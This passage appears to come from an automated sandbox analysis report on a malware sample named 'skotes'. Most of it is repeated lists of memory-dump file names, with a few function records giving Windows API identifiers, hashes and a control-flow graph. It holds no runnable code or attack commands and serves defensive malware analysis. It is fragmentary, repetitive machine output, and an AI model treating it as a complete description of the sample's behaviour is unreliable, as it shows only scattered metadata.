                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183298522.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183323287.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183337101.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183349265.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183362592.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183448160.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183462698.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183480656.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183493828.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183532091.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183543836.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183557679.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183570847.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183588010.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183601098.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183613091.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183637557.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183655100.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183666981.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183679723.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183691415.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183704714.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183718528.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183731288.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183743704.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183757632.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183770268.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183791695.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183805801.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183818899.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183833396.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183846914.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183859103.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183873159.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183921886.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183940513.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183959130.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183973738.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183986076.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184002179.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184014073.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184027530.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184061928.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 6fda7cd50d46170cdaee5070a283375b10a6b3d98d4394609565a71ac4062b38
                                                                                                                                                                                                                                              • Instruction ID: a128c0bdc5e2d67f410042de91a01fc68a9da378789039b6015bacabe79d8fb2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6fda7cd50d46170cdaee5070a283375b10a6b3d98d4394609565a71ac4062b38
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8219E313002409BFB189F28ECD97ADF7E2DBD2310F24425AE414D77D1D7BA56808362

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 351 c0d82f-c0d83a 352 c0d848-c0d84e 351->352 353 c0d83c-c0d846 351->353 355 c0d850-c0d851 352->355 356 c0d867-c0d878 RtlAllocateHeap 352->356 353->352 354 c0d87c-c0d887 call c075f6 353->354 360 c0d889-c0d88b 354->360 355->356 357 c0d853-c0d85a call c09dc0 356->357 358 c0d87a 356->358 357->354 364 c0d85c-c0d865 call c08e36 357->364 358->360 364->354 364->356
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C0A813,00000001,00000364,00000006,000000FF,?,00C0EE3F,?,00000004,00000000,?,?), ref: 00C0D871
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183241564.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183253576.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183298522.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183323287.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183337101.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183349265.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183362592.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183448160.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183462698.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183480656.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183493828.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183532091.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183543836.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183557679.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183570847.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183588010.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183601098.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183613091.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183637557.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183655100.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183666981.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183679723.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183691415.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183704714.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183718528.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183731288.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183743704.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183757632.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183770268.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183791695.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183805801.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183818899.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183833396.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183846914.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183859103.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183873159.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183921886.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183940513.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183959130.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183973738.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183986076.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184002179.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184014073.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184027530.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184061928.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: 580037214f909f26204802b77f99db7b13e9b56949af7a758f33981938c07486
                                                                                                                                                                                                                                              • Instruction ID: 3af2a01fa10a5e42643cc2dd707ebf348a418987a5bd31cb7118ef3fa45e4aa7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 580037214f909f26204802b77f99db7b13e9b56949af7a758f33981938c07486
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCF02E3161522566EB212AF39C01B5B3759DF45370F14C321FD1A971C1DA30EE00D5E0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183241564.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183253576.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183298522.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183323287.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183337101.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183349265.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183362592.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183448160.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183462698.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183480656.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183493828.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183532091.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183543836.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183557679.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183570847.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183588010.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183601098.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183613091.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183637557.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183655100.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183666981.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183679723.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183691415.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183704714.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183718528.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183731288.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183743704.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183757632.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183770268.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183791695.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183805801.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183818899.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183833396.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183846914.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183859103.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183873159.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183921886.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183940513.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183959130.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183973738.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183986076.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184002179.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184014073.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184027530.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184061928.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 32384418-0
                                                                                                                                                                                                                                              • Opcode ID: 5e18ff47379110c3353f6eedc7bf85d00bad8705d24bc153c0f2f49ad584825a
                                                                                                                                                                                                                                              • Instruction ID: b0361ddea56a55447289c4fa14b07856d6b442d5074d26971a03cf8454ca6531
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e18ff47379110c3353f6eedc7bf85d00bad8705d24bc153c0f2f49ad584825a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8A1CF70A012469FDB10DB65C944B5AFBE8FF15714F0485AAE815E7342FB31EA05CBD2
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183241564.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183253576.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183298522.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183323287.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183337101.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183349265.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183362592.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183448160.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183462698.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183480656.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183493828.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183532091.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183543836.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183557679.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183570847.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183588010.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183601098.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183613091.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183637557.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183655100.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183666981.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183679723.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183691415.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183704714.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183718528.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183731288.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183743704.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183757632.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183770268.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183791695.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183805801.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183818899.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183833396.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183846914.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183859103.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183873159.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183921886.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183940513.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183959130.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
